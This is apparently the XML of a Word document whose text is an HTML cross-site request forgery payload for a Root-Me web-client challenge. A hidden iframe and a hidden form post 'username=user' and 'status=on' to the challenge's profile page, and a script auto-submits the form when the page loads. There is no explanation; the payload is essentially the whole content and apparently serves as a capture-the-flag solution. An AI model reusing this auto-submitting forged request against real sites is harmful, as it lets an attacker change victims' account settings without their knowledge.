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BD29" w14:textId="77777777" w:rsidR="005215D6" w:rsidRDefault="005215D6" w:rsidP="005215D6">
      <w:r>
        <w:t>&lt;iframe style="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>display:none</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>" name="csrf-frame"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB9E97" w14:textId="77777777" w:rsidR="005215D6" w:rsidRDefault="005215D6" w:rsidP="005215D6">
      <w:r>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>form  id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>="csrf-form" target="csrf-frame" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile" method="POST" enctype="multipart/form-data"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2FF8BF" w14:textId="77777777" w:rsidR="005215D6" w:rsidRDefault="005215D6" w:rsidP="005215D6">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="username" value="user" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6694D3" w14:textId="77777777" w:rsidR="005215D6" w:rsidRDefault="005215D6" w:rsidP="005215D6">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="status" value="on" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30682989" w14:textId="77777777" w:rsidR="005215D6" w:rsidRDefault="005215D6" w:rsidP="005215D6">
      <w:r>
        <w:t xml:space="preserve">      &lt;input type="submit" value="Submit request" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270E402B" w14:textId="77777777" w:rsidR="005215D6" w:rsidRDefault="005215D6" w:rsidP="005215D6">
      <w:r>
        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9FCB4C" w14:textId="68C06B77" w:rsidR="007F0132" w:rsidRPr="005215D6" w:rsidRDefault="005215D6" w:rsidP="005215D6">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.getElementById</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("csrf-form").submit()&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007F0132" w:rsidRPr="00521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ED"/>
    <w:rsid w:val="00460FED"/>
    <w:rsid w:val="005215D6"/>
    <w:rsid w:val="007F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DB47"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{38E1BB3C-7B18-4995-9A71-19ACBD40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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-06T14:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-06T14:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>